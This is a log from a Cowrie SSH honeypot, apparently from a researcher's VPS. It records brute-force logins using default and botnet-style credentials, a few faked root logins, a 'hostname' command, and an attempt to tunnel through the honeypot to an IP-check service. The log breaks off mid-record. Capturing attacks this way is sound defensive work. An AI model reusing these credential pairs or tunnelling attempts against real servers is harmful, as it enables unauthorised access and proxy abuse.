{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:29.331284Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10268,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdebf5f3c6b2","protocol":"ssh","message":"New connection: 212.227.235.229:10268 (1.2.3.4:22) [session: cdebf5f3c6b2]","sensor":"my-vps","timestamp":"2025-08-31T06:28:29.537719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:28:29.538764Z","src_ip":"212.227.235.229","session":"cdebf5f3c6b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:28:29.750127Z","src_ip":"212.227.235.229","session":"cdebf5f3c6b2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:28:30.626948Z","src_ip":"212.227.235.229","session":"cdebf5f3c6b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50840,"dst_ip":"1.2.3.4","dst_port":22,"session":"016cec35bebc","protocol":"ssh","message":"New connection: 212.227.235.229:50840 (1.2.3.4:22) [session: 016cec35bebc]","sensor":"my-vps","timestamp":"2025-08-31T06:28:31.622656Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:31.837335Z","src_ip":"212.227.235.229","session":"cdebf5f3c6b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56152,"dst_ip":"1.2.3.4","dst_port":22,"session":"b122adc35c96","protocol":"ssh","message":"New connection: 212.227.235.229:56152 (1.2.3.4:22) [session: b122adc35c96]","sensor":"my-vps","timestamp":"2025-08-31T06:28:32.051754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:28:32.053005Z","src_ip":"212.227.235.229","session":"b122adc35c96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:28:32.267138Z","src_ip":"212.227.235.229","session":"b122adc35c96"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:28:32.365179Z","src_ip":"212.227.235.229","session":"016cec35bebc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:28:32.366459Z","src_ip":"212.227.235.229","session":"016cec35bebc"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:28:33.072793Z","src_ip":"212.227.235.229","session":"4b9cff5db108"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:28:33.169763Z","src_ip":"212.227.235.229","session":"b122adc35c96"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:33.385334Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:33.386442Z","src_ip":"212.227.235.229","session":"b122adc35c96"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":54008,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9578cf59e1f","protocol":"ssh","message":"New connection: 201.148.180.50:54008 (1.2.3.4:22) [session: b9578cf59e1f]","sensor":"my-vps","timestamp":"2025-08-31T06:28:33.516799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:28:34.386448Z","src_ip":"201.148.180.50","session":"b9578cf59e1f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:28:34.387174Z","src_ip":"201.148.180.50","session":"b9578cf59e1f"}
{"eventid":"cowrie.session.closed","duration":"32.4","message":"Connection lost after 32.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:38.153342Z","src_ip":"212.227.235.229","session":"4b9cff5db108"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"root123","message":"login attempt [tomcat/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:28:38.658263Z","src_ip":"212.227.235.229","session":"016cec35bebc"}
{"eventid":"cowrie.login.success","username":"root","password":"Alpha","message":"login attempt [root/Alpha] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:28:40.299097Z","src_ip":"201.148.180.50","session":"b9578cf59e1f"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:40.469558Z","src_ip":"212.227.235.229","session":"016cec35bebc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52950,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f01e8ad3635","protocol":"ssh","message":"New connection: 212.227.125.160:52950 (1.2.3.4:22) [session: 8f01e8ad3635]","sensor":"my-vps","timestamp":"2025-08-31T06:28:41.868510Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:28:42.434480Z","src_ip":"201.148.180.50","session":"b9578cf59e1f"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T06:28:42.435420Z","src_ip":"201.148.180.50","session":"b9578cf59e1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:43.291399Z","src_ip":"201.148.180.50","session":"b9578cf59e1f"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:43.292638Z","src_ip":"201.148.180.50","session":"b9578cf59e1f"}
{"eventid":"cowrie.session.closed","duration":"23.2","message":"Connection lost after 23.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:50.040586Z","src_ip":"212.227.235.229","session":"82bc0f0818de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40782,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e97de07c278","protocol":"ssh","message":"New connection: 212.227.125.160:40782 (1.2.3.4:22) [session: 4e97de07c278]","sensor":"my-vps","timestamp":"2025-08-31T06:28:53.174010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:28:53.617531Z","src_ip":"212.227.125.160","session":"4e97de07c278"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:28:53.618784Z","src_ip":"212.227.125.160","session":"4e97de07c278"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"root123","message":"login attempt [tomcat/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:28:55.610132Z","src_ip":"212.227.125.160","session":"4e97de07c278"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:28:57.276430Z","src_ip":"212.227.125.160","session":"8f01e8ad3635"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:28:57.374026Z","src_ip":"212.227.125.160","session":"8f01e8ad3635"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:57.537807Z","src_ip":"212.227.125.160","session":"4e97de07c278"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38344,"dst_ip":"1.2.3.4","dst_port":22,"session":"cae41eb88b19","protocol":"ssh","message":"New connection: 212.227.235.229:38344 (1.2.3.4:22) [session: cae41eb88b19]","sensor":"my-vps","timestamp":"2025-08-31T06:28:58.005141Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53918,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd2a1087fab8","protocol":"ssh","message":"New connection: 212.227.125.160:53918 (1.2.3.4:22) [session: cd2a1087fab8]","sensor":"my-vps","timestamp":"2025-08-31T06:29:03.101373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T06:29:03.103368Z","src_ip":"212.227.125.160","session":"cd2a1087fab8"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T06:29:03.161006Z","src_ip":"212.227.125.160","session":"cd2a1087fab8"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:29:03.444563Z","src_ip":"212.227.125.160","session":"cd2a1087fab8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"52.208.26.198","dst_port":443,"src_ip":"212.227.125.160","src_port":55588,"message":"direct-tcp connection request to 52.208.26.198:443 from 127.0.0.1:55588","sensor":"my-vps","timestamp":"2025-08-31T06:29:04.857328Z","session":"cd2a1087fab8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"52.208.26.198","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x86gu\\xab\\xb4~\\x17o\\xfa}\\xb4\\xb6\\xa7\\xf7;\\x7f\\xfe\\x91\\xda\\xcd8\\xb6\\xa3\\xd14A\\xa6\\x8ab'\\xfd\\n @a\\xf0(\\xd1\\xdd[\\ntxU\\xe8\\xe9{\\xafa\\x14\\xc1\\x9b>\\xa37b\\xd2\\x10\\x00\\xf3\\x00\\xc0\\xd0\\xbc\\xb7\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xe5\\x11q\\x9c\\xf3\\xfbs`\\xeb*ev<v\\x14\\xd1\\xc4T\\xc9s\\xb3\\x8e\\x8aU \\x1c:[\\x16\\x1c5J\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 52.208.26.198:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x86gu\\xab\\xb4~\\x17o\\xfa}\\xb4\\xb6\\xa7\\xf7;\\x7f\\xfe\\x91\\xda\\xcd8\\xb6\\xa3\\xd14A\\xa6\\x8ab'\\xfd\\n @a\\xf0(\\xd1\\xdd[\\ntxU\\xe8\\xe9{\\xafa\\x14\\xc1\\x9b>\\xa37b\\xd2\\x10\\x00\\xf3\\x00\\xc0\\xd0\\xbc\\xb7\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 